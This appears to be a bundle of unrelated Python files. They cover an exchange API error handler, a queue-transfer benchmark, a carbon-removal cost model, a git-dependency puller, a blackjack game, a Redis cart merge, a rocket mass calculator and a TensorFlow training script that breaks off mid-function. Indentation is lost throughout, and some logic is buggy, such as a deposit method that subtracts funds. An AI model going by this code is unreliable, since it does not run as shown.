response = self.publicGetOrderbook(self.extend({
'market': self.market_id(symbol),
'type': 'ALL',
'depth': 50,
}, params))
orderbook = response['result']
return self.parse_order_book(orderbook, None, 'buy', 'sell', 'Rate', 'Quantity')
def throw_exception_on_error(self, response):
if 'message' in response:
if response['message'] == 'Insufficient fundsnot ':
raise InsufficientFunds(self.id + ' ' + self.json(response))
if response['message'] == 'MIN_TRADE_REQUIREMENT_NOT_MET':
raise InvalidOrder(self.id + ' ' + self.json(response))
if response['message'] == 'APIKEY_INVALID':
if self.hasAlreadyAuthenticatedSuccessfully:
raise DDoSProtection(self.id + ' ' + self.json(response))
else:
raise AuthenticationError(self.id + ' ' + self.json(response))
if response['message'] == 'DUST_TRADE_DISALLOWED_MIN_VALUE_50K_SAT':
raise InvalidOrder(self.id + ' order cost should be over 50k satoshi ' + self.json(response))
|
"""Counts the time of transferring an object to the queue and reading it from it.
Compares different implementations: torch tensor, numpy array, with and without shared memory.
Run: `python -m tests.perf.queue_transfer`
"""
import multiprocessing as mp
import time
from multiprocessing import Queue
import logging
import torch
from aqueduct.shm import SharedFieldsMixin
from .utils import (
ImViewType,
MAGIC_NUMBER,
MPType,
StopProcess,
get_image,
get_mp_classes,
timeit,
)
class BaseTask:
def __init__(self, image):
self.im = image
class Task(SharedFieldsMixin, BaseTask):
pass
def worker(q_in: Queue):
while True:
try:
start, task = q_in.get()
except TypeError:
break
assert task.im[0][0][0] == MAGIC_NUMBER
logging.info(f'queue transfer time: {(time.monotonic() - start) * 10**3:.4f}')
# для правильного замера времени - чтобы gc мог удалить task и вернуть shared память в ОС сразу
# после обработки задачи, а не после того, как получена новая задача из очереди: q_in.get()
# todo обсудить момент, что unlink занимает столько же или больше времени, чем трансфер объекта
# возможно это не так важно, т.к. это время несравнимо со временем работы с объектом
task = None
def run(view_type: ImViewType, mp_type: MPType, share: bool = False):
logging.info(f'{view_type.value} image, {mp_type.value} multiprocessing, share: {share}')
q_class, p_class = get_mp_classes(mp_type)
task_type = Task if view_type == ImViewType.NUMPY and share else BaseTask
q_task = q_class()
p = p_class(target=worker, args=(q_task,))
p.start()
for _ in range(10):
im = get_image()
if view_type == ImViewType.NUMPY:
if share:
with timeit() as t:
task = task_type(im)
task.share_value('im')
else:
with timeit() as t:
task = task_type(im)
elif view_type == ImViewType.TT:
if share:
with timeit() as t:
tensor = torch.from_numpy(im)
np_array = tensor.numpy()
# it takes less than 0.1 ms
# logging.info(f'tensor converting time, ms: {t.seconds * 10 ** 3:.4f}')
with timeit() as t:
task = task_type(tensor)
task.im.share_memory_()
else:
with timeit() as t:
task = task_type(torch.from_numpy(im))
logging.info(f'task creating time, ms: {t.seconds * 10**3:.4f}')
q_task.put((time.monotonic(), task))
time.sleep(0.001)
q_task.put(StopProcess())
p.join()
def main():
run(ImViewType.NUMPY, MPType.PYTHON)
run(ImViewType.TT, MPType.TORCH)
run(ImViewType.TT, MPType.TORCH, True)
run(ImViewType.NUMPY, MPType.PYTHON, True)
if __name__ == '__main__':
mp.set_start_method('fork')
main()
|
import pandas as pd
import numpy as np
import warnings
import io
import itertools
import yaml
import math
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import os
# read csv data
#df = pd.read_excel('./assessment/output/fig2.9_data_table.xlsx')
df = pd.read_csv('./assessment/output/CombinedCsvsWithOutcome.csv')
# drop the negative negatives
#df = df[df.Variable != 'Emissions|CO2|Net-negative-negative']
yrs = np.linspace(2020,2100,17) # every 5 years included
print(df.Variable.unique())
print(df.shape)
x = df.groupby(['model', 'scenario']).size().reset_index().rename(columns={0:'count'})
print(type(x))
print(x.iloc[0])
print(x.iloc[0].model)
print(len(x))
#newRows = make a new dataframe/new rows for dac
for n in range(len(x)):
y = df[df.model == x.iloc[n].model]
y = y[y.scenario == x.iloc[n].scenario].drop(columns = ['model', 'scenario', 'Unnamed: 0', 'marker', 'category'])
t = y[y.Variable == 'Total CDR'].drop(columns=['Variable']).values
a = y[y.Variable == 'AFOLU CDR'].drop(columns=['Variable']).values
b = y[y.Variable == 'BECCS'].drop(columns=['Variable']).values
nn = y[y.Variable == 'Net negative CO2'].drop(columns=['Variable']).values
c = y[y.Variable == 'Compensate CDR'].drop(columns=['Variable']).values
if a.size == 0:
d = np.round(t-b,4)
elif b.size == 0:
d = np.round(t-a, 4)
else:
d = np.round((t-(a+b)),4)
print(d)
print(np.sum(d))
#if np.sum(d)>0:
#print(df.groupby(['model', 'scenario']).count())
# check to see how much DAC is included
dfcost = df # make a copy
afolu_cost = 50 #$/ton
ccs_biomass = 80 #$/ton
ccs_dac = 100 #$/ton
ccs_ew = 100 #$/ton I have no idea on this one
ccs_other = 100 # need to figure out if net negative is just unspecified get rid of it or what the deal is
# calculate costs for different types of ccs
for n in range(len(dfcost)):
if dfcost.Variable.iloc[n] == 'AFOLU CDR':
c = afolu_cost
elif dfcost.Variable.iloc[n] == 'BECCS':
c = ccs_biomass
elif dfcost.Variable.iloc[n] == 'Net negative CO2':
c = 0
elif dfcost.Variable.iloc[n] == 'Compensate CDR':
c = 0
else:
c = 0
for r in range(17):
if math.isnan(dfcost[str(int(yrs[r]))][n])==False:
dfcost[str(int(yrs[r]))].iloc[n] = dfcost[str(int(yrs[r]))].iloc[n]*c*1000*1000*1000 #convert from Gt to tons
dfcost.to_csv('costouttest.csv') # still has nans
# calculate one annual total per model & scenario combo
g = dfcost.groupby(['category', 'model', 'scenario']).agg({'2020': 'sum', '2025': 'sum', '2030': 'sum', '2035': 'sum', '2040': 'sum', '2045': 'sum', '2050': 'sum', '2055': 'sum', '2060': 'sum', '2065': 'sum', '2070': 'sum', '2075': 'sum', '2080': 'sum', '2085': 'sum', '2090': 'sum', '2095': 'sum', '2100':'sum'})
g = g.reset_index()
print(len(g))
print(g.columns)
# add a category column
g.to_csv('midpointout.csv')
# interpolate where necessary
for n in range(len(g)):
for r in range(15):
# check previous and next values
if g.iloc[n,r+4]==0:
if g.iloc[n, r+3] != 0:
if g.iloc[n,r+5] != 0:
g.iat[n, r+4] = (g.iloc[n, r+3] + g.iloc[n, r+5])/2
# reformat
for r in range(17-1):
lb = yrs[r]
ub = yrs[r+1]
for m in range(4):
g[str(int(lb+m+1))] = np.zeros(len(g))
for r in range(16):
lb = yrs[r]
ub = yrs[r+1]
for m in range(len(g)):
if math.isnan(df[str(int(lb))].iloc[m])==True:
lb = yrs[r-1]
if math.isnan(df[str(int(ub))].iloc[m])==True:
ub = yrs[r+2]
z = int(ub - lb - 1)
for q in range(z):
g[str(int(lb+q+1))].iloc[m] = (g[str(int(lb))].iloc[m]*(z-q)+g[str(int(ub))].iloc[m]*(q+1))/(z+1)
a = np.linspace(2000, 2100, 101).astype(int) #tolist()
a = a.tolist()
#print(a)
#print(df.columns)
#print(g.columns)
g = g.reindex(columns = ['model', 'scenario', 'category', '2020', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030', '2031', '2032', '2033', '2034', '2035', '2036', '2037', '2038', '2039', '2040', '2041', '2042', '2043', '2044', '2045', '2046', '2047', '2048', '2049', '2050', '2051', '2052', '2053', '2054', '2055', '2056', '2057', '2058', '2059', '2060', '2061', '2062', '2063', '2064', '2065', '2066', '2067', '2068', '2069', '2070', '2071', '2072', '2073', '2074', '2075', '2076', '2077', '2078', '2079', '2080', '2081', '2082', '2083', '2084', '2085', '2086', '2087', '2088', '2089', '2090', '2091', '2092', '2093', '2094', '2095', '2096', '2097', '2098', '2099', '2100'])
print(df.Variable.unique())
g_discounted_stern = g.copy()
g_discounted_nordhaus = g.copy()
g_discounted_avg = g.copy()
# do some discounting
stern_delta = 0.001
nordhaus_delta = 0.015
avg_delta = (stern_delta+nordhaus_delta)/2
global_growth = 0.03 # this is a guesstimate, would need to review actual historical data
r = 0.03 # dummy discount rate
#n = 81
#g_discounted_stern['2100'] = g_discounted_stern['2100']*(1/((1+(r+stern_delta))**(n+1)))
for n in range(2100-2020+1):
g_discounted_stern[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+stern_delta))**(n+1)))
g_discounted_nordhaus[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+nordhaus_delta))**(n+1)))
g_discounted_avg[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+avg_delta))**(n+1)))
# calculate NPVs
def calcNPV(df):
df['NPV'] = np.zeros(len(df))
for n in range(2100-2020+1):
df['NPV'] = df['NPV'] + df[str(int(n+2020))]
return df
g_discounted_stern = calcNPV(g_discounted_stern)
g_discounted_nordhaus = calcNPV(g_discounted_nordhaus)
g_discounted_avg = calcNPV(g_discounted_avg)
def makePlot(df, figName):
df1 = df.drop(columns = ['category', 'model', 'scenario', 'NPV'])
d = df1.values
plt.figure(figsize=(5,3.5))
ax1 = plt.subplot(position=[0.15, 0.13, 0.6, 0.7])
for m in range(len(d)):
plt.plot(np.linspace(2020, 2100, 81), d[m,:]/1000000000) #billions of dollars
plt.ylim(0,1100)
plt.xlabel('Year')
plt.ylabel('Billions of dollars')
plt.title('Annual Costs (discounted)')
npv = np.sum(d, axis = 1)
print(npv.shape)
ax2 = plt.subplot(position = [0.85, 0.13, 0.1, 0.7])
plt.boxplot(npv/1000000000000) #trillions of dollars
plt.ylim(0, 50)
plt.title('NPV')
plt.ylabel('Trillions of dollars')
plt.savefig(figName, dpi=300)
makePlot(g_discounted_stern, 'Figures/SternOut.png')
makePlot(g_discounted_nordhaus, 'Figures/NordhausOut.png')
makePlot(g_discounted_avg, 'Figures/AvgOut.png')
#print(g_discounted_avg[:5])
def makePlotbyCategory(df, figName):
d1 = df[df.category == 'Below 1.5C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d2 = df[df.category == '1.5C low overshoot'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d3 = df[df.category == '1.5C high overshoot'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d4 = df[df.category == 'Lower 2C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d5 = df[df.category == 'Higher 2C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
c = {'d1':d1.values, 'd2':d2.values, 'd3':d3.values, 'd4':d4.values, 'd5':d5.values}
labs = ('Below 1.5C', '1.5C low\novershoot', '1.5C high\novershoot', 'Lower 2C', 'Higher 2C')
plt.figure(figsize=(7, 4))
for n in range(5):
p = c['d'+str(n+1)]
plt.subplot(position = [0.08+0.135*n, 0.14, 0.12, 0.78])
#plt.subplot(position = [0.08+0.17*n, 0.14, 0.15, 0.78])
for m in range(len(p)):
plt.plot(np.linspace(2020, 2100, 81), p[m,:]/1000000000) #billions of dollars
plt.xlabel('Year', fontsize = 8)
plt.ylim(-100, 1000)
plt.title(labs[n], fontsize = 8)
plt.yticks([0, 200, 400, 600, 800, 1000], labels = (' ', ' ', ' ', ' ', ' ', ' '), fontsize = 8)
plt.xticks([2020, 2030, 2040, 2050, 2060, 2070, 2080, 2090, 2100], labels = ('2020', ' ', ' ', ' ', '2060', ' ', ' ', ' ', '2100'), fontsize =6, rotation = 90)
if n == 0:
plt.ylabel('Billions of dollars', fontsize = 8)
plt.yticks([0, 200, 400, 600, 800, 1000], labels = ('0', '200', '400', '600', '800', '1000'), fontsize = 6)
plt.subplot(position = [0.81, 0.14, 0.17, 0.78])
for n in range(5):
p = c['d'+str(n+1)]
npv = np.sum(p, axis = 1)/1000000000000 # trillions of dollars
plt.boxplot(npv, positions = [n]) #trillions of dollars
plt.ylim(-10, 50)
plt.xlim(-0.5, 4.5)
plt.ylabel('Trillions of dollars', fontsize = 8)
plt.yticks([0, 10, 20, 30, 40, 50], labels = ('0', '10', '20', '30', '40', '50'), fontsize = 6)
plt.xticks([0, 1,2,3,4], labels = labs, fontsize = 6, rotation = 90)
#plt.xticks([0, 1,2], labels = labs, fontsize = 6, rotation = 90)
plt.savefig(figName, dpi=300)
makePlotbyCategory(g_discounted_stern, 'Figures/SternByScenario.png')
makePlotbyCategory(g_discounted_nordhaus, 'Figures/NordhausByScenario.png')
makePlotbyCategory(g_discounted_avg, 'Figures/AvgByScenario.png')
|
from django.db import models
from git import Repo
import git
import shutil
import os
import json
def abs_path(path):
return os.path.abspath(os.path.join(os.path.dirname(__file__), '..', path))
env = {
'config101': abs_path('../101worker/configs/production.json'),
'config101schema': abs_path('../101worker/schemas/config.schema.json'),
'data101url': 'http://data.101companies.org/',
'diffs101dir': abs_path('../101diffs'),
'dumps101dir': abs_path('../101web/data/dumps'),
'data101dir': abs_path('../101web/data'),
'endpoint101url': 'http://101companies.org/endpoint/',
'explorer101url': 'http://101companies.org/resources/',
'extractor101dir': abs_path('../101worker/extractors'),
'gatheredGeshi101dir': abs_path('../101results/geshi'),
'gitdeps101dir': abs_path('../101results/gitdeps'),
'gitdeps101url': 'http://101companies.org/pullRepo.json',
'last101run': '0',
'logs101dir': abs_path('../101logs'),
'module101schema': abs_path( '../101worker/schemas/module.schema.json'),
'modules101dir': abs_path('../101worker/modules'),
'ontoDir': abs_path('../101web/data/onto'),
'output101dir': abs_path('..'),
'predicates101deps': abs_path('../101worker/modules/predicates101meta/module.json'),
'predicates101dir': abs_path('../101worker/predicates'),
'repo101dir': abs_path('../101results/101repo'),
'repo101url': 'https://github.com/101companies/101repo',
'results101dir': abs_path('../101results'),
'targets101dir': abs_path('../101web/data/resources'),
'temps101dir': abs_path('../101temps'),
'themes101dir': abs_path('../101web/data/resources/themes'),
'validator101dir': abs_path('../101worker/validators'),
'views101dir': abs_path('../101web/data/views'),
'web101dir': abs_path('../101web'),
'wiki101url': 'http://101companies.org/wiki/',
'worker101dir': abs_path('../101worker')
}
def convert_diff(diff):
file_1 = diff.a_path
file_2 = diff.b_path
if diff.a_mode == 0 and diff.a_blob is None:
return { 'type': 'DELETED_FILE', 'file': file_2 }
elif diff.b_mode == 0 and diff.b_blob is None:
return { 'type': 'NEW_FILE', 'file': file_1 }
else:
return { 'type': 'FILE_CHANGED', 'file': file_1 }
def copy_gitdeps(changes, env):
for change in changes:
if change['type'] == 'NEW_FILE':
target_file = os.path.join(env['repo101dir'], '/'.join(change['file'].split('/')[2:]))
dirname = os.path.dirname(target_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
source_file = os.path.join(env['gitdeps101dir'], change['file'])
shutil.copyfile(source_file, target_file)
def pull_gitdeps(env, gitdeps):
def pull_gitdep(dep):
user = dep['sourcerepo'].split('/')[-2]
filename = dep['sourcerepo'].split('/')[-1].replace('.git', '')
path = os.path.join(env['gitdeps101dir'], user, filename)
if os.path.exists(os.path.join(path, '.git')):
repo = Repo(path)
return list(pull_repo(repo))
else:
try:
print(dep['sourcerepo'])
repo = Repo.clone_from(dep['sourcerepo'], path, branch='master')
result = []
for root, dirnames, filenames in os.walk(path):
for f in filenames:
f = os.path.join(root, f).replace(env['gitdeps101dir'], '')[1:]
if '.git/' in f:
continue
result.append({ 'type': 'NEW_FILE', 'file': f})
return result
except git.exc.GitCommandError:
return []
return sum(list(map(pull_gitdep, gitdeps)), [])
def load_gitdeps(env):
with open(os.path.abspath(os.path.join(env['repo101dir'], '.gitdeps'))) as f:
return json.load(f)
def pull_repo(repo):
base_commit = repo.head.commit.hexsha
info = repo.remotes.origin.pull('master')[0]
diffs = info.commit.diff(base_commit)
return list(map(lambda diff: convert_diff(diff), diffs))
def create_repo(env):
try:
return Repo(env['repo101dir'])
except git.exc.InvalidGitRepositoryError:
return Repo.clone_from('https://github.com/101companies/101repo.git', env['repo101dir'], branch='master')
def checkout_commit(repo, commit):
repo.git.checkout(commit)
def history(repo, commit):
return repo.iter_commits(commit)
|
"""
Helper functions.
Source -> https://github.com/jrosebr1/imutils/blob/master/imutils/video/webcamvideostream.py
"""
import datetime
import io
from PIL import Image
import yaml
DATETIME_STR_FORMAT = "%Y-%m-%d_%H:%M:%S.%f"
def pil_image_to_byte_array(image):
imgByteArr = io.BytesIO()
image.save(imgByteArr, "PNG")
return imgByteArr.getvalue()
def byte_array_to_pil_image(byte_array):
return Image.open(io.BytesIO(byte_array))
def get_now_string() -> str:
return datetime.datetime.now().strftime(DATETIME_STR_FORMAT)
def get_config(config_filepath: str) -> dict:
with open(config_filepath) as f:
config = yaml.safe_load(f)
return config
|
import random
from IPython.core.display import display, HTML
from IPython.display import clear_output
board = [
"┌───┬───┬───┐",
"│ 7 │ 8 │ 9 │",
"├───┼───┼───┤",
"│ 4 │ 5 │ 6 │",
"├───┼───┼───┤",
"│ 1 │ 2 │ 3 │",
"└───┴───┴───┘"
]
class Card:
def __init__(self, suit, rank, values, icon):
self.suit = suit
self.rank = rank
self.values = list(values)
self.icon = icon
class Deck():
def __init__(self):
self.cards = []
generic_cards = [('ace', [1, 11])]
for i in range(2, 11):
generic_cards.append((f'{i}', [i]))
for face in ['jack', 'queen', 'king']:
generic_cards.append((face, [10]))
cards_graphic = list('🂱🂲🂳🂴🂵🂶🂷🂸🂹🂺🂻🂽🂾🂡🂢🂣🂤🂥🂦🂧🂨🂩🂪🂫🂭🂮🃁🃂🃃🃄🃅🃆🃇🃈🃉🃊🃋🃍🃎🃑🃒🃓🃔🃕🃖🃗🃘🃙🃚🃛🃝🃞')
for base, suit in enumerate(['hearts', 'spades', 'diamonds', 'clubs']):
for i, card in enumerate(generic_cards):
self.cards.append(Card(suit=suit, rank=card[0], values=card[1],
icon=cards_graphic.pop(0)))
random.shuffle(self.cards)
def __len__(self):
return len(self.cards)
def __str__(self):
result = ''
for card in self.cards:
result += f'{card.icon}'
return result
def pop(self):
return self.cards.pop()
class Hand():
def __init__(self):
self.cards = []
def is_bust(self):
total = 0
for card in self.cards:
total += min(card.values)
return total > 21
def is_blackjack(self):
if self.is_bust():
return False
return 21 in self.totals()
def append(self, card):
self.cards.append(card)
return not self.is_bust()
def totals(self):
totals = [0]
for card in self.cards:
if len(card.values) == 1:
for i, total in enumerate(totals):
totals[i] += card.values[0]
continue
second_options = totals.copy()
for i, total in enumerate(totals):
totals[i] += card.values[0]
second_options[i] += card.values[1]
totals += second_options
return list(filter(lambda x: x <= 21, set(totals)))
def __str__(self):
result = ''
for card in self.cards:
result += card.icon
return result
class Player(Hand):
def __init__(self):
Hand.__init__(self)
self.hidden = None
def dealt_hidden(self, card):
self.hidden = card
def dealt(self, card):
self.append(card)
return not self.is_bust()
def score(self):
if len(self.totals()) == 0:
return 0
return max(self.totals())
def __str__(self):
result = Hand.__str__(self)
if self.hidden is not None:
result += '?'
totals = self.totals()
result += f' {totals}'
return result
class Dealer(Player):
def __init__(self):
Player.__init__(self)
def reveal(self):
card = self.hidden
self.dealt(card)
self.hidden = None
return card
def is_standing(self):
totals = self.totals()
for total in totals:
if total >= 17:
return True
return False
class Table():
def __init__(self):
self.dealer = Dealer()
self.player = Player()
self.deck = Deck()
self.player.dealt(self.deck.pop())
self.player.dealt(self.deck.pop())
self.dealer.dealt(self.deck.pop())
self.dealer.dealt_hidden(self.deck.pop())
self.pot = 0
def print(self):
clear_output()
print(f"Dealer {self.dealer}")
print(f"Player {self.player}")
def pot(self):
return self.pot()
def player_rounds(self, bank):
while True:
balance = bank.balance('player')
bet = input(f'Please make your bet {balance} : ')
try:
if int(bet) <= 0:
continue
bank.withdraw('player', int(bet))
self.pot += int(bet)
break
except Exception as e:
print(e)
continue
# Player chooses actions in a loop until they want to stop, hit 21, or are bust
while True:
self.print()
if self.player.is_blackjack():
print(f"player has blackjack")
break
while True:
choice = input("'h'it or 's'tand : ")
if choice in ['s', 'h']:
break
if choice == 's':
break
card = self.deck.pop()
if not self.player.dealt(card):
print(f"player dealt {card.icon} and busted")
break
if self.player.is_blackjack():
print(f"player dealt {card.icon} and has blackjack")
break
print(f"player dealt {card.icon}")
return self.player.score()
def dealer_rounds(self):
# Dealer after players are done then exposes the hidden card
# they continue pulling cards until they exceed 17, or bust
if not self.player.is_bust():
card = self.dealer.reveal()
while True:
self.print()
if self.dealer.is_blackjack():
print(f"dealer dealt {card.icon} and has blackjack")
break
if self.dealer.is_bust():
print(f'dealer is bust')
break
if self.dealer.is_standing():
break
card = self.deck.pop()
self.dealer.dealt(card)
return self.dealer.score()
class AccountExistsError(Exception):
pass
class AccountNotFoundError(Exception):
pass
class InSufficentFunds(Exception):
pass
class Bank():
def __init__(self):
self.players = dict()
def open(self, name, amount):
if name in self.players:
raise AccountExistsError()
self.players[name] = amount
def withdraw(self, name, amount):
if name not in self.players:
raise AccountNotFoundError()
if self.players[name] < amount:
raise InSufficentFunds()
self.players[name] -= amount
return self.players[name]
def deposit(self, name, amount):
if name not in self.players:
raise AccountNotFoundError()
if self.players[name] < amount:
raise InSufficentFunds()
self.players[name] -= amount
return self.players[name]
def balance(self, name):
if name not in self.players:
raise AccountNotFoundError()
return self.players[name]
def run_hands(table, bank):
player_score = table.player_rounds(bank)
dealer_score = table.dealer_rounds()
if not table.player.is_bust() and player_score > dealer_score:
return 'player'
return 'dealer'
def run_game(bank):
if bank.balance('player') <= 0:
raise InSufficentFunds()
table = Table()
winner = run_hands(table, bank)
if winner == 'player':
bank.deposit('player', table.pot())
def run():
bank = Bank()
bank.open('player', 100)
while True:
balance = bank.balance('player')
print(f'player has {balance} chips')
run_game(bank)
if __name__ == "__main__":
try:
run()
except InSufficentFunds:
print("Thank you for playing, bring more gold next time")
|
from django_redis import get_redis_connection
from utils import myjson
def merge_cart_cookie_to_redis(request, user_id, response):
"""
合并购物车数据到redis中
:param request: 用于读取cookie信息
:param user: 当前登陆用户
:param response: 响应对象,清除cookie数据
:return:
"""
# 获取cookie中购物车信息
cart_str = request.COOKIES.get("cart")
# 若为空,则直接返回响应
if not cart_str:
return response
# 拿到字典类型的cookie中购物车数据
cookie_cart_dict = myjson.loads(cart_str)
# 定义字典,用于向redis中保存数据
redis_cart_dict = {}
# 记录redis勾选状态的sku_id
redis_cart_selected_add = [] # 添加sku_id列表
redis_cart_selected_remove = [] # 删除sku_id列表
# 获取redis连接
redis_conn = get_redis_connection("cart")
redis_pip = redis_conn.pipeline()
# 合并cookie购物车与redis购物车,保存到redis_cart_dict字典中
for sku_id, count_select_dict in cookie_cart_dict.items():
"""
cookie中数据保存格式
{
sku_id: {
"count": xxx, // 数量
"selected": True // 是否勾选
},
...
}
"""
# 处理商品数量
redis_cart_dict[sku_id] = count_select_dict['count']
# 处理勾选状态,若勾选,则向添加列表中添加sku_id,反之则向删除列表中添加sku_id
if count_select_dict['selected']:
redis_cart_selected_add.append(sku_id)
else:
redis_cart_selected_remove.append(sku_id)
# 如果添加完以后redis_cart_dict中有数据,则向redis中存储
if redis_cart_dict:
redis_pip.hmset('cart_%s' % user_id, redis_cart_dict)
if redis_cart_selected_add:
redis_pip.sadd('cart_selected_%s' % user_id, *redis_cart_selected_add)
if redis_cart_selected_remove:
redis_pip.srem('cart_selected_%s' % user_id, *redis_cart_selected_remove)
redis_pip.execute()
# 删除cookie中存储的信息
# response.delete_cookie('cart')
response.set_cookie('cart', 0, max_age=0)
return response
|
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 27 20:14:02 2014
@author: Julian
calculating the physics of a reusable rocket with controlled powered return capability
Initial Vehicle input is retrieved from reqs.dat
"""
import numpy as np
import matplotlib.pyplot as plt
input_data = np.genfromtxt('reqs.dat', dtype='float', comments='#', delimiter=' ')
I_sp = input_data[0]
PL = input_data[1]
DV = input_data[2]
lamb = PL/(505846-PL)
c = I_sp * 9.81
MR = np.exp(DV/c)
eps = (1+lamb+lamb*MR)/MR
#rocket mass ratios
M_s = PL * eps/lamb
M_e = M_s + PL
M_0 = MR * M_e
M_f = M_0 - M_e
M_s, M_e, M_0, M_f = (np.round((M_s, M_e, M_0, M_f), decimals=0))
print
print 'Required rocket data (not reusable):'
print
print 'Payload Mass: ', PL, '[kg]'
print 'Structural Mass: ', M_s, '[kg]'
print 'Empty Mass: ', M_e, '[kg]'
print 'Fuel Mass: ', M_f, '[kg]'
print 'Lift-Off Mass: ', M_0, '[kg]'
MR = np.exp(DV/c)
M_sr = M_s/ ((MR*(1-1/MR))*(1+1/(MR*(1-1/MR))))
M_e = M_sr + PL
M_fr = (MR+1)*M_sr + M_f
M_0 = M_e + M_sr + M_fr
M_sr, M_e, M_0, M_fr = (np.round((M_sr, M_e, M_0, M_fr), decimals=0))
print
print 'Required rocket data (reusable):'
print
print 'Payload Mass: ', PL, '[kg]'
print 'Structural Mass: ', M_sr, '[kg]'
print 'Empty Mass: ', M_e, '[kg]'
print 'Fuel Mass: ', M_fr, '[kg]'
print 'Lift-Off Mass: ', M_0, '[kg]'
print
print (PL/lamb+PL)*np.exp(-2*DV/c)
|
#!/usr/bin/env python
import os
import json
import logging
import numpy as np
import tensorflow as tf
from tensorflow.contrib import rnn
from cell import dnn_cell
def main():
trainRnnModel = TrainRnnModel()
trainRnnModel.train()
class TrainRnnModel(object):
def __init__(self):
self.name_variabel_map = {}
def train(self):
json_file_path = "./examples/dnn_example.json"
rnn_model = dnn_cell.DnnModel.load_from_json(json_file_path)
print("Build model op")
#x_train = np.ones((32, 784))
x_train = np.random.rand(32, 784)
#y_train = np.zeros((32, 10))
y_train = np.random.randint(0, 2, size=(32, 10))
input_feature_size = 784
output_label_size = 10
learning_rate = 0.5
epoch_number = 10
batch_size = 1
buffer_size = 10
step_to_validate = 1
tensorboard_path = "./tensorboard"
if os.path.exists(tensorboard_path) == False:
os.makedirs(tensorboard_path)
checkpoint_path = "./checkpoint"
if os.path.exists(checkpoint_path) == False:
os.makedirs(checkpoint_path)
checkpoint_file = checkpoint_path + "/checkpoint.ckpt"
latest_checkpoint = tf.train.latest_checkpoint(checkpoint_path)
x_placeholder = tf.placeholder(tf.float32, [None, input_feature_size])
y_placeholder = tf.placeholder(tf.float32, [None, output_label_size])
print("Build train graph")
global_step = tf.Variable(
0, dtype=tf.int32, trainable=False, name="global_step")
# input layer
"""
output0 = fc_layer(x_placeholder, input_feature_size, input_feature_size, activation="tanh", index=0)
output1 = fc_layer(output0, input_feature_size, input_feature_size, activation="tanh", index=1)
output2 = fc_layer(output1, input_feature_size, input_feature_size, activation="tanh", index=2)
output7 = fc_layer(output1, input_feature_size, input_feature_size, activation="tanh", index=7)
average_output = (output2 + output7) / 2
"""
total_node_number = len(rnn_model.nodes)
# Example: {"0": Output0, "1": Output1, "2: Output2}
index_output_map = {}
for i in range(total_node_number):
# TODO: Need to make sure that nodes are stores with index in array
node = rnn_model.nodes[i]
if i == 0:
input = x_placeholder
else:
input = index_output_map.get(str(node.previous_index), None)
output = self.fc_layer(
input,
input_feature_size,
input_feature_size,
activation_function=node.activation_function,
index=node.index)
index_output_map[str(i)] = output
# Example: [0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0]
have_next_node_array = [0 for i in range(total_node_number)]
for node in rnn_model.nodes:
if node.previous_index is not None:
have_next_node_array[node.previous_index] = 1
average_output = None
not_have_next_total_number = 0
for i in range(total_node_number):
if have_next_node_array[i] == 0:
not_have_next_total_number += 1
if average_output == None:
average_output = index_output_map.get(str(i), None)
else:
average_output += index_output_map.get(str(i), None)
average_output = average_output / not_have_next_total_number
# output layer
input = average_output
output_w = tf.get_variable(
"output_w", [input_feature_size, output_label_size],
dtype=tf.float32,
initializer=tf.zeros_initializer)
output_b = tf.get_variable(
"output_b", [output_label_size],
dtype=tf.float32,
initializer=tf.zeros_initializer)
logits = tf.matmul(input, output_w) + output_b
#loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=y_placeholder))
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=y_placeholder))
train_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(
loss, global_step=global_step)
# Save Variables with names in order to restore from other architectures
saver = tf.train.Saver(self.name_variabel_map)
tf.summary.scalar("global_step", global_step)
summary_op = tf.summary.merge_all()
# Start training
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(tensorboard_path, sess.graph)
self.restore_from_checkpoint(sess, saver, latest_checkpoint)
try:
for i in range(epoch_number):
_, loss_value, step_value = sess.run(
[train_op, loss, global_step],
feed_dict={x_placeholder: x_train,
y_placeholder: y_train})
if step_value % step_to_validate == 0:
summary_value = sess.run(summary_op)
print("Run step: {}, loss: {}".format(step_value, loss_value))
writer.add_summary(summary_value, step_value)
saver.save(sess, checkpoint_file, global_step=step_value)
except tf.errors.OutOfRangeError:
print("End of training")
def restore_from_checkpoint(self, sess, saver, checkpoint):
if checkpoint:
logging.info("Restore session from checkpoint: {}".format(checkpoint))
saver.restore(sess, checkpoint)
return True
else:
logging.warn("Checkpoint not found: {}".format(checkpoint))
return False
def fc_layer(self,
input,
input_shape,
output_shape,
activation_function="tanh",
index=None):
"""
weight = tf.get_variable(
"weight_{}".format(index), [input_shape, output_shape],
dtype=tf.float32,
initializer=tf.zeros_initializer)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=tf.zeros_initializer)
"""
weight = tf.get_variable(
"weight_{}".format(index), [input_shape, output_shape],
dtype=tf.float32,
initializer=None)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=None)
self.name_variabel_map["weight_{}".format(index)] = weight
self.name_variabel_map["bias_{}".format(index)] = bias
output = tf.matmul(input, weight) + bias
if activation_function == "tanh":
output = tf.nn.tanh(output)
elif activation_function == "relu":
output = tf.nn.relu(output)
elif activation_function == "identity":
output = output
elif activation_function == "sigmoid":
output = tf.nn.sigmoid(output)
else:
output = tf.nn.relu(output)
return output
def lstm_layer(self,
input,
input_shape,
output_shape,
activation_function="tanh",
index=None):
RNN_HIDDEN_UNITS = 32
RNN_LAYER_NUMBER = 2
weight = tf.get_variable(
"weight_{}".format(index), [RNN_HIDDEN_UNITS, output_shape],
dtype=tf.float32,
